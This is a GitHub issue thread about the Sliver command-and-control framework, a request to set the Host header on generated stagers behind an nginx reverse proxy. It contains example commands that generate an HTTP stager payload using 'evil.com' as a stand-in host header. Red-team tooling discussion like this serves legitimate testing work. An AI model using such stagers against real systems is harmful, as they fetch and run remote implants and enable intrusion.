### ISSUE TITLE
Add option to specify Host header in generated stagers

### ISSUE THREAD

**Issue by ke1satsu** [BishopFox/sliver#1209]
I tested putting an nginx reverse proxy in front of sliver and unless I pointed my default server at the stage-listener the connection wouldn't go through.
I noted that the request for the stager did not have a host header set, so after designating my sliver stager-listener as default it started working. I couldn't find a way to set this in the options.

**Comment by moloch--** [comment]
https://github.com/BishopFox/sliver/wiki/C2-Advanced-Options

**Comment by ke1satsu** [comment]
I'm not sure those options are supported by generate stager? Maybe I'm misunderstanding something.

generate stager -r http -L example.com?host-header=evil.com -l 80 -f hex gives
"Error resolving example.com?host-header=evil.com: lookup example.com?host-header=evil.com: no such host"

**Comment by RafBishopFox** [comment]
@ke1satsu - I added functionality in PR #1265 to allow you to specify advanced options to `generate stager` / `generate msf-stager`. For your example, it would look something like this:
```
generate msf-stager -r http -L example.com -d HttpHostHeader=evil.com -l 80 -f hex
```

**Comment by ke1satsu** [comment]
That's awesome, great work :)
